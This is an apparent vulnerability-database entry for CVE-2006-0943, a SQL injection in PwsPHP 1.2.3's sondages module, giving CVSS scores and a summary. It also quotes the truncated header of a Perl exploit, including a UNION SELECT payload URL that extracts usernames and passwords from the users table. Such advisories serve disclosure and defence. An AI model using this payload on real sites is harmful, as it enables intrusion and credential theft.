7.5
CVSSv2

CVE-2006-0943

Published: 01/03/2006 Updated: 18/10/2018
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in the sondages module in index.php in PwsPHP 1.2.3 allows remote malicious users to execute arbitrary SQL commands via the id parameter to index.php.

Vulnerable Product Search on Vulmon Subscribe to Product

pwsphp pwsphp 1.2.3

Exploits

#!/usr/bin/perl # # PwsPHP <= 124 (indexphp) Remote SQL Injection Exploit # examplecom/indexphp?mod=sondages&do=results&id=1%20union%20select%20id,0,0,pseudo,pass,pseudo,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20%60users%60%20/* # Discovered by: papipsycho (papipsychocom) (WOrlddefacersde) # ported by str0ke (milw0rmcom) use L ...